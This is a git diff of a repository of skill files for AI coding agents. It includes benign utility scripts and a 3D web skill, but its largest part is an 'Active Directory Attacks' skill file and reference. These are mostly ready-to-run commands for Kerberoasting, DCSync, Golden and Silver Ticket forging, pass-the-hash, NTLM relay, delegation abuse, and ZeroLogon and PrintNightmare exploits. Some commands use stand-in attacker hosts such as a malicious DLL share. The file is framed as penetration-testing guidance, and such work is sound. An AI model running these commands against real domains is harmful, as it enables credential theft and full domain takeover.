- **[anthropics/claude-cookbooks](https://github.com/anthropics/claude-cookbooks)**: Official notebooks and recipes for building with Claude.
- **[vercel-labs/agent-skills](https://github.com/vercel-labs/agent-skills)**: Vercel Labs official skills - React Best Practices, Web Design Guidelines.
- **[openai/skills](https://github.com/openai/skills)**: OpenAI Codex skills catalog - Agent skills, Skill Creator, Concise Planning.

### Community Contributors

@@ -131,8 +242,15 @@ This collection would not be possible without the incredible work of the Claude

- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure and Backend/Frontend Guidelines.
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns and Design Systems.
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Loki Mode and Playwright integration.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite & Guide (Source for ~60 new skills).
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering and PM toolkit.
- **[karanb192/awesome-claude-skills](https://github.com/karanb192/awesome-claude-skills)**: A massive list of verified skills for Claude Code.
- **[zircote/.claude](https://github.com/zircote/.claude)**: Shopify development skill reference.

### Inspirations

- **[f/awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)**: Inspiration for the Prompt Library.
- **[leonardomso/33-js-concepts](https://github.com/leonardomso/33-js-concepts)**: Inspiration for JavaScript Mastery.

---
@@ -142,4 +260,18 @@ MIT License. See [LICENSE](LICENSE) for details.

---

**Keywords**: Claude Code, Antigravity, Agentic Skills, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns.
**Keywords**: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding Assistant, AI Agent Skills, MCP, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns, LLM Tools, AI IDE, Coding AI, AI Pair Programming, Vibe Coding, Agentic Coding, AI Developer Tools.

---

## 🏷️ GitHub Topics

For repository maintainers, add these topics to maximize discoverability:

```text
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp,
ai-developer-tools, ai-pair-programming, vibe-coding, skill, skills, SKILL.md, rules.md, CLAUDE.md, GEMINI.md, CURSOR.md
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp
```
119
scripts/skills_manager.py
Executable file
@@ -0,0 +1,119 @@
#!/usr/bin/env python3
"""
Skills Manager - Easily enable/disable skills locally

Usage:
    python3 scripts/skills_manager.py list           # List active skills
    python3 scripts/skills_manager.py disabled       # List disabled skills
    python3 scripts/skills_manager.py enable SKILL   # Enable a skill
    python3 scripts/skills_manager.py disable SKILL  # Disable a skill
"""

import sys
import os
from pathlib import Path

SKILLS_DIR = Path(__file__).parent.parent / "skills"
DISABLED_DIR = SKILLS_DIR / ".disabled"


def list_active():
    """List all active skills"""
    print("🟢 Active Skills:\n")
    # Real directories only; symlinks are reported separately below,
    # so the totals do not double-count symlinked skills
    skills = sorted([d.name for d in SKILLS_DIR.iterdir()
                     if d.is_dir() and not d.is_symlink()
                     and not d.name.startswith('.')])
    symlinks = sorted([s.name for s in SKILLS_DIR.iterdir()
                       if s.is_symlink()])

    for skill in skills:
        print(f"  • {skill}")

    if symlinks:
        print("\n📎 Symlinks:")
        for link in symlinks:
            target = os.readlink(SKILLS_DIR / link)
            print(f"  • {link} → {target}")

    print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks")


def list_disabled():
    """List all disabled skills"""
    if not DISABLED_DIR.exists():
        print("❌ No disabled skills directory found")
        return

    print("⚪ Disabled Skills:\n")
    disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()])

    for skill in disabled:
        print(f"  • {skill}")

    print(f"\n📊 Total: {len(disabled)} disabled skills")


def enable_skill(skill_name):
    """Enable a disabled skill"""
    source = DISABLED_DIR / skill_name
    target = SKILLS_DIR / skill_name

    if not source.exists():
        print(f"❌ Skill '{skill_name}' not found in .disabled/")
        return False

    if target.exists():
        print(f"⚠️  Skill '{skill_name}' is already active")
        return False

    source.rename(target)
    print(f"✅ Enabled: {skill_name}")
    return True


def disable_skill(skill_name):
    """Disable an active skill"""
    source = SKILLS_DIR / skill_name
    target = DISABLED_DIR / skill_name

    if not source.exists():
        print(f"❌ Skill '{skill_name}' not found")
        return False

    if source.name.startswith('.'):
        print(f"⚠️  Cannot disable system directory: {skill_name}")
        return False

    if source.is_symlink():
        print(f"⚠️  Cannot disable symlink: {skill_name}")
        print("   (Remove the symlink manually if needed)")
        return False

    DISABLED_DIR.mkdir(exist_ok=True)
    source.rename(target)
    print(f"✅ Disabled: {skill_name}")
    return True


def main():
    if len(sys.argv) < 2:
        print(__doc__)
        sys.exit(1)

    command = sys.argv[1].lower()

    if command == "list":
        list_active()
    elif command == "disabled":
        list_disabled()
    elif command == "enable":
        if len(sys.argv) < 3:
            print("❌ Usage: skills_manager.py enable SKILL_NAME")
            sys.exit(1)
        enable_skill(sys.argv[2])
    elif command == "disable":
        if len(sys.argv) < 3:
            print("❌ Usage: skills_manager.py disable SKILL_NAME")
            sys.exit(1)
        disable_skill(sys.argv[2])
    else:
        print(f"❌ Unknown command: {command}")
        print(__doc__)
        sys.exit(1)


if __name__ == "__main__":
    main()
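At its core, the enable/disable logic above is a plain directory rename between `skills/` and `skills/.disabled/`. A minimal sketch of the same round trip against a throwaway directory tree (all paths here are synthetic, created just for the demo):

```python
import tempfile
from pathlib import Path

# Build a throwaway skills tree mirroring the layout the script expects
root = Path(tempfile.mkdtemp())
skills = root / "skills"
disabled = skills / ".disabled"
(skills / "demo-skill").mkdir(parents=True)

# disable: move skills/demo-skill -> skills/.disabled/demo-skill
disabled.mkdir(exist_ok=True)
(skills / "demo-skill").rename(disabled / "demo-skill")
assert not (skills / "demo-skill").exists()
assert (disabled / "demo-skill").is_dir()

# enable: move it back
(disabled / "demo-skill").rename(skills / "demo-skill")
assert (skills / "demo-skill").is_dir()
print("round trip ok")
```

Because `Path.rename` is atomic on the same filesystem, a toggle never leaves a half-copied skill behind, which is why the script prefers renaming over copy-and-delete.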
114
scripts/sync_recommended_skills.sh
Executable file
@@ -0,0 +1,114 @@
#!/bin/bash
# sync_recommended_skills.sh
# Syncs only the 35 recommended skills from GitHub repo to local central library

set -e

# Paths
GITHUB_REPO="/Users/nicco/Antigravity Projects/antigravity-awesome-skills/skills"
LOCAL_LIBRARY="/Users/nicco/.gemini/antigravity/scratch/.agent/skills"
BACKUP_DIR="/Users/nicco/.gemini/antigravity/scratch/.agent/skills_backup_$(date +%Y%m%d_%H%M%S)"

# 35 Recommended Skills
RECOMMENDED_SKILLS=(
    # Tier S - Core Development (13)
    "systematic-debugging"
    "test-driven-development"
    "writing-skills"
    "doc-coauthoring"
    "planning-with-files"
    "concise-planning"
    "software-architecture"
    "senior-architect"
    "senior-fullstack"
    "verification-before-completion"
    "git-pushing"
    "address-github-comments"
    "javascript-mastery"

    # Tier A - Your Projects (12)
    "docx-official"
    "pdf-official"
    "pptx-official"
    "xlsx-official"
    "react-best-practices"
    "web-design-guidelines"
    "frontend-dev-guidelines"
    "webapp-testing"
    "playwright-skill"
    "mcp-builder"
    "notebooklm"
    "ui-ux-pro-max"

    # Marketing & SEO (1)
    "content-creator"

    # Corporate (4)
    "brand-guidelines-anthropic"
    "brand-guidelines-community"
    "internal-comms-anthropic"
    "internal-comms-community"

    # Planning & Documentation (1)
    "writing-plans"

    # AI & Automation (5)
    "workflow-automation"
    "llm-app-patterns"
    "autonomous-agent-patterns"
    "prompt-library"
    "github-workflow-automation"
)

echo "🔄 Sync Recommended Skills"
echo "========================="
echo ""
echo "📍 Source: $GITHUB_REPO"
echo "📍 Target: $LOCAL_LIBRARY"
echo "📊 Skills to sync: ${#RECOMMENDED_SKILLS[@]}"
echo ""

# Create backup
echo "📦 Creating backup at: $BACKUP_DIR"
cp -r "$LOCAL_LIBRARY" "$BACKUP_DIR"
echo "✅ Backup created"
echo ""

# Clear local library (keep README.md if exists)
echo "🗑️  Clearing local library..."
cd "$LOCAL_LIBRARY"
for item in */; do
    rm -rf "$item"
done
echo "✅ Local library cleared"
echo ""

# Copy recommended skills
echo "📋 Copying recommended skills..."
SUCCESS_COUNT=0
MISSING_COUNT=0

for skill in "${RECOMMENDED_SKILLS[@]}"; do
    if [ -d "$GITHUB_REPO/$skill" ]; then
        cp -r "$GITHUB_REPO/$skill" "$LOCAL_LIBRARY/"
        echo "  ✅ $skill"
        # Plain arithmetic assignment: ((SUCCESS_COUNT++)) returns status 1
        # when the counter is 0, which would abort the script under set -e
        SUCCESS_COUNT=$((SUCCESS_COUNT + 1))
    else
        echo "  ⚠️  $skill (not found in repo)"
        MISSING_COUNT=$((MISSING_COUNT + 1))
    fi
done

echo ""
echo "📊 Summary"
echo "=========="
echo "✅ Copied: $SUCCESS_COUNT skills"
echo "⚠️  Missing: $MISSING_COUNT skills"
echo "📦 Backup: $BACKUP_DIR"
echo ""

# Verify (-mindepth 1 excludes the library directory itself from the count)
FINAL_COUNT=$(find "$LOCAL_LIBRARY" -mindepth 1 -maxdepth 1 -type d | wc -l | tr -d ' ')
echo "🎯 Final count in local library: $FINAL_COUNT skills"
echo ""
echo "Done! Your local library now has only the recommended skills."
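Since the script only warns about skills missing from the repo at copy time, the same check can be done ahead of time with a set difference. A sketch in Python (the list is truncated to three entries and the directory tree is synthetic, built only for the demo):

```python
import tempfile
from pathlib import Path

# A few entries from the RECOMMENDED_SKILLS list above
recommended = {"systematic-debugging", "test-driven-development", "writing-plans"}

def missing_skills(repo_skills_dir: Path, wanted: set) -> set:
    """Return the wanted skills that have no directory under repo_skills_dir."""
    present = {d.name for d in repo_skills_dir.iterdir() if d.is_dir()}
    return wanted - present

# Demo against a throwaway tree containing two of the three skills
repo = Path(tempfile.mkdtemp())
for name in ("systematic-debugging", "writing-plans"):
    (repo / name).mkdir()
print(missing_skills(repo, recommended))  # {'test-driven-development'}
```

Running such a dry-run check before clearing the local library avoids discovering missing skills only after the old copies are gone.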
3
skills/.gitignore
vendored
Normal file
@@ -0,0 +1,3 @@
# Local-only: disabled skills for lean configuration
# These skills are kept in the repository but disabled locally
.disabled/
254
skills/3d-web-experience/SKILL.md
Normal file
@@ -0,0 +1,254 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience."
source: vibeship-spawner-skills (Apache 2.0)
---

# 3D Web Experience

**Role**: 3D Web Experience Architect

You bring the third dimension to the web. You know when 3D enhances and when it's just showing off. You balance visual impact with performance. You make 3D accessible to users who've never touched a 3D app. You create moments of wonder without sacrificing usability.

## Capabilities

- Three.js implementation
- React Three Fiber
- WebGL optimization
- 3D model integration
- Spline workflows
- 3D product configurators
- Interactive 3D scenes
- 3D performance optimization

## Patterns

### 3D Stack Selection

Choosing the right 3D approach

**When to use**: When starting a 3D web project

```python
## 3D Stack Selection

### Options Comparison
| Tool | Best For | Learning Curve | Control |
|------|----------|----------------|---------|
| Spline | Quick prototypes, designers | Low | Medium |
| React Three Fiber | React apps, complex scenes | Medium | High |
| Three.js vanilla | Max control, non-React | High | Maximum |
| Babylon.js | Games, heavy 3D | High | Maximum |

### Decision Tree
```
Need quick 3D element?
└── Yes → Spline
└── No → Continue

Using React?
└── Yes → React Three Fiber
└── No → Continue

Need max performance/control?
└── Yes → Three.js vanilla
└── No → Spline or R3F
```

### Spline (Fastest Start)
```jsx
import Spline from '@splinetool/react-spline';

export default function Scene() {
  return (
    <Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
  );
}
```

### React Three Fiber
```jsx
import { Canvas } from '@react-three/fiber';
import { OrbitControls, useGLTF } from '@react-three/drei';

function Model() {
  const { scene } = useGLTF('/model.glb');
  return <primitive object={scene} />;
}

export default function Scene() {
  return (
    <Canvas>
      <ambientLight />
      <Model />
      <OrbitControls />
    </Canvas>
  );
}
```
```
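The decision tree in the pattern above is simple enough to encode as a pure function, which is handy when scaffolding tools need to pick a stack programmatically. A sketch (the function name and flags are illustrative, not part of any library):

```python
def pick_3d_stack(quick_element: bool, uses_react: bool, needs_max_control: bool) -> str:
    """Mirror the stack-selection decision tree: first match wins."""
    if quick_element:
        return "Spline"
    if uses_react:
        return "React Three Fiber"
    if needs_max_control:
        return "Three.js vanilla"
    return "Spline or R3F"

# A React app that is past the quick-prototype stage lands on R3F
print(pick_3d_stack(quick_element=False, uses_react=True, needs_max_control=False))
# React Three Fiber
```

The early-return ordering matters: it reproduces the tree's top-down priority, where "quick element" short-circuits everything else.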

### 3D Model Pipeline

Getting models web-ready

**When to use**: When preparing 3D assets

```python
## 3D Model Pipeline

### Format Selection
| Format | Use Case | Size |
|--------|----------|------|
| GLB/GLTF | Standard web 3D | Smallest |
| FBX | From 3D software | Large |
| OBJ | Simple meshes | Medium |
| USDZ | Apple AR | Medium |

### Optimization Pipeline
```
1. Model in Blender/etc
2. Reduce poly count (< 100K for web)
3. Bake textures (combine materials)
4. Export as GLB
5. Compress with gltf-transform
6. Test file size (< 5MB ideal)
```

### GLTF Compression
```bash
# Install gltf-transform
npm install -g @gltf-transform/cli

# Compress model
gltf-transform optimize input.glb output.glb \
  --compress draco \
  --texture-compress webp
```

### Loading in R3F
```jsx
import { useGLTF, useProgress, Html } from '@react-three/drei';
import { Suspense } from 'react';

function Loader() {
  const { progress } = useProgress();
  return <Html center>{progress.toFixed(0)}%</Html>;
}

export default function Scene() {
  return (
    <Canvas>
      <Suspense fallback={<Loader />}>
        <Model />
      </Suspense>
    </Canvas>
  );
}
```
```
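Step 6 of the pipeline (keep exports under the ~5 MB ideal) is worth automating in a build check. A minimal gate, with the budget taken from the text above and the helper name being a hypothetical convenience, not an existing tool:

```python
import tempfile
from pathlib import Path

SIZE_BUDGET = 5 * 1024 * 1024  # ~5 MB, the "ideal" ceiling from the pipeline above

def glb_within_budget(path: Path, budget: int = SIZE_BUDGET) -> bool:
    """True when the exported model is a .glb file under the size budget."""
    return path.suffix == ".glb" and path.stat().st_size <= budget

# Demo with a throwaway 1 KB stand-in file
p = Path(tempfile.mkdtemp()) / "model.glb"
p.write_bytes(b"\x00" * 1024)
print(glb_within_budget(p))  # True
```

Wiring a check like this into CI catches an un-compressed export before it ships, rather than after users hit a slow first load.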

### Scroll-Driven 3D

3D that responds to scroll

**When to use**: When integrating 3D with scroll

```python
## Scroll-Driven 3D

### R3F + Scroll Controls
```jsx
import { useRef } from 'react';
import { ScrollControls, useScroll } from '@react-three/drei';
import { useFrame } from '@react-three/fiber';

function RotatingModel() {
  const scroll = useScroll();
  const ref = useRef();

  useFrame(() => {
    // Rotate based on scroll position
    ref.current.rotation.y = scroll.offset * Math.PI * 2;
  });

  return <mesh ref={ref}>...</mesh>;
}

export default function Scene() {
  return (
    <Canvas>
      <ScrollControls pages={3}>
        <RotatingModel />
      </ScrollControls>
    </Canvas>
  );
}
```

### GSAP + Three.js
```javascript
import gsap from 'gsap';
import ScrollTrigger from 'gsap/ScrollTrigger';

gsap.registerPlugin(ScrollTrigger);

gsap.to(camera.position, {
  scrollTrigger: {
    trigger: '.section',
    scrub: true,
  },
  z: 5,
  y: 2,
});
```

### Common Scroll Effects
- Camera movement through scene
- Model rotation on scroll
- Reveal/hide elements
- Color/material changes
- Exploded view animations
```

## Anti-Patterns

### ❌ 3D For 3D's Sake

**Why bad**: Slows down the site. Confuses users. Drains battery on mobile. Doesn't help conversion.

**Instead**: 3D should serve a purpose. Product visualization = good. Random floating shapes = probably not. Ask: would an image work?

### ❌ Desktop-Only 3D

**Why bad**: Most traffic is mobile. Kills battery. Crashes on low-end devices. Frustrated users.

**Instead**: Test on real mobile devices. Reduce quality on mobile. Provide a static fallback. Consider disabling 3D on low-end devices.

### ❌ No Loading State

**Why bad**: Users think it's broken. High bounce rate. 3D takes time to load. Bad first impression.

**Instead**: Loading progress indicator. Skeleton/placeholder. Load 3D after the page is interactive. Optimize model size.

## Related Skills

Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`

380
skills/active-directory-attacks/SKILL.md
Normal file
@@ -0,0 +1,380 @@
---
name: Active Directory Attacks
description: This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.
---

# Active Directory Attacks

## Purpose

Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.

## Inputs/Prerequisites

- Kali Linux or Windows attack platform
- Domain user credentials (for most attacks)
- Network access to Domain Controller
- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec

## Outputs/Deliverables

- Domain enumeration data
- Extracted credentials and hashes
- Kerberos tickets for impersonation
- Domain Administrator access
- Persistent access mechanisms

---

## Essential Tools

| Tool | Purpose |
|------|---------|
| BloodHound | AD attack path visualization |
| Impacket | Python AD attack tools |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos attacks |
| CrackMapExec | Network exploitation |
| PowerView | AD enumeration |
| Responder | LLMNR/NBT-NS poisoning |

---

## Core Workflow

### Step 1: Kerberos Clock Sync

Kerberos requires clock synchronization (±5 minutes):

```bash
# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time

# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"

# Fix clock on Windows
net time /domain /set

# Fake clock without changing system time
faketime -f '+8h' <command>
```
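The ±5-minute rule can be checked programmatically before any Kerberos authentication is attempted. A minimal sketch, where the remote timestamp is assumed to come from a scan like the `smb2-time` check above (the sample values below are invented for the demo):

```python
from datetime import datetime, timedelta, timezone

MAX_SKEW = timedelta(minutes=5)  # Kerberos default clock-skew tolerance

def within_kerberos_skew(local: datetime, remote: datetime) -> bool:
    """True when |local - remote| is inside the tolerated skew."""
    return abs(local - remote) <= MAX_SKEW

now = datetime(2024, 4, 14, 18, 25, 16, tzinfo=timezone.utc)
dc_time = now + timedelta(minutes=7)  # e.g. the value a DC scan reported
print(within_kerberos_skew(now, dc_time))  # False -> fix the clock first
```

A failing check here explains otherwise-cryptic `KRB_AP_ERR_SKEW`-style failures, so it pays to run it before blaming credentials.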
|
||||
### Step 2: AD Reconnaissance with BloodHound
|
||||
|
||||
```bash
|
||||
# Start BloodHound
|
||||
neo4j console
|
||||
bloodhound --no-sandbox
|
||||
|
||||
# Collect data with SharpHound
|
||||
.\SharpHound.exe -c All
|
||||
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
|
||||
|
||||
# Python collector (from Linux)
|
||||
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
|
||||
```
|
||||
|
||||
### Step 3: PowerView Enumeration
|
||||
|
||||
```powershell
|
||||
# Get domain info
|
||||
Get-NetDomain
|
||||
Get-DomainSID
|
||||
Get-NetDomainController
|
||||
|
||||
# Enumerate users
|
||||
Get-NetUser
|
||||
Get-NetUser -SamAccountName targetuser
|
||||
Get-UserProperty -Properties pwdlastset
|
||||
|
||||
# Enumerate groups
|
||||
Get-NetGroupMember -GroupName "Domain Admins"
|
||||
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
|
||||
|
||||
# Find local admin access
|
||||
Find-LocalAdminAccess -Verbose
|
||||
|
||||
# User hunting
|
||||
Invoke-UserHunter
|
||||
Invoke-UserHunter -Stealth
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Attacks
|
||||
|
||||
### Password Spraying
|
||||
|
||||
```bash
|
||||
# Using kerbrute
|
||||
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
|
||||
|
||||
# Using CrackMapExec
|
||||
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
|
||||
```
|
||||
|
||||
### Kerberoasting
|
||||
|
||||
Extract service account TGS tickets and crack offline:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.txt
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 13100 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### AS-REP Roasting
|
||||
|
||||
Target accounts with "Do not require Kerberos preauthentication":
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
|
||||
|
||||
# Crack with hashcat
|
||||
hashcat -m 18200 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
### DCSync Attack
|
||||
|
||||
Extract credentials directly from DC (requires Replicating Directory Changes rights):
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
|
||||
|
||||
# Mimikatz
|
||||
lsadump::dcsync /domain:domain.local /user:krbtgt
|
||||
lsadump::dcsync /domain:domain.local /user:Administrator
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Kerberos Ticket Attacks

### Pass-the-Ticket (Golden Ticket)

Forge a TGT for any user with the krbtgt hash:

```powershell
# Get the krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
```

### Silver Ticket

Forge a TGS for a specific service:

```powershell
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
```

### Pass-the-Hash

```bash
# Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH

# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
```

### OverPass-the-Hash

Convert an NTLM hash into a Kerberos ticket:

```bash
# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache

# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
```

---
## NTLM Relay Attacks

### Responder + ntlmrelayx

```bash
# Start Responder (disable its SMB and HTTP servers in Responder.conf when relaying)
responder -I eth0 -wrf

# Start the relay
ntlmrelayx.py -tf targets.txt -smb2support

# LDAP relay for a delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
```

### SMB Signing Check

Relaying only works against hosts that do not require SMB signing, so generate the target list first:

```bash
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
```

---
## Certificate Services Attacks (AD CS)

### ESC1 - Misconfigured Templates

```bash
# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10

# Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate with the certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```

### ESC8 - Web Enrollment Relay

```bash
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

---
## Critical CVEs

### ZeroLogon (CVE-2020-1472)

```bash
# Check vulnerability
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon

# Exploit
python3 cve-2020-1472-exploit.py DC01 10.10.10.10

# Extract hashes
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass

# Restore the machine account password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
```

### PrintNightmare (CVE-2021-1675)

```bash
# Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'

# Exploit (requires hosting a malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
```

### samAccountName Spoofing (CVE-2021-42278/42287)

```bash
# Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
```

---
## Quick Reference

| Attack | Tool | Command |
|--------|------|---------|
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |

---
## Constraints

**Must:**

- Synchronize time with the DC before Kerberos attacks
- Have valid domain credentials for most attacks
- Document all compromised accounts

**Must Not:**

- Lock out accounts with excessive password spraying
- Modify production AD objects without approval
- Leave Golden Tickets without documentation

**Should:**

- Run BloodHound for attack path discovery
- Check for SMB signing before relay attacks
- Verify patch levels before CVE exploitation

---
## Examples

### Example 1: Domain Compromise via Kerberoasting

```bash
# 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10

# 2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt

# 3. Crack the tickets
hashcat -m 13100 tgs.txt rockyou.txt

# 4. Use the cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
```

### Example 2: NTLM Relay to LDAP

```bash
# 1. Start the relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access

# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12

# 3. Use the created machine account for an RBCD attack
```

---
## Troubleshooting

| Issue | Solution |
|-------|----------|
| Clock skew too great | Sync time with the DC or use faketime |
| Kerberoasting returns empty | No service accounts with SPNs exist |
| DCSync access denied | Requires Replicating Directory Changes rights |
| NTLM relay fails | Check SMB signing; try an LDAP target |
| BloodHound empty | Verify the collector ran with correct creds |

---
## Additional Resources

For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).

382 skills/active-directory-attacks/references/advanced-attacks.md Normal file
@@ -0,0 +1,382 @@
# Advanced Active Directory Attacks Reference

## Table of Contents

1. [Delegation Attacks](#delegation-attacks)
2. [Group Policy Object Abuse](#group-policy-object-abuse)
3. [RODC Attacks](#rodc-attacks)
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
6. [Trust Relationship Attacks](#trust-relationship-attacks)
7. [ADFS Golden SAML](#adfs-golden-saml)
8. [Credential Sources](#credential-sources)
9. [Linux AD Integration](#linux-ad-integration)

---
## Delegation Attacks

### Unconstrained Delegation

When a user authenticates to a computer with unconstrained delegation, their TGT is cached in that computer's memory.

**Find delegation:**

```powershell
# PowerShell
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

# BloodHound
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
```

**SpoolService abuse:**

```bash
# Check the spooler service
ls \\dc01\pipe\spoolss

# Trigger with SpoolSample
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local

# Or with printerbug.py
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
```

**Monitor with Rubeus:**

```powershell
Rubeus.exe monitor /interval:1
```

### Constrained Delegation

**Identify:**

```powershell
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
```

**Exploit with Rubeus:**

```powershell
# S4U2self/S4U2proxy attack
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

**Exploit with Impacket:**

```bash
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
```

### Resource-Based Constrained Delegation (RBCD)

```powershell
# Create a machine account
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

# Set delegation
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$

# Get a ticket
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
```

---
## Group Policy Object Abuse

### Find Vulnerable GPOs

```powershell
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
```

### Abuse with SharpGPOAbuse

```powershell
# Add a local admin
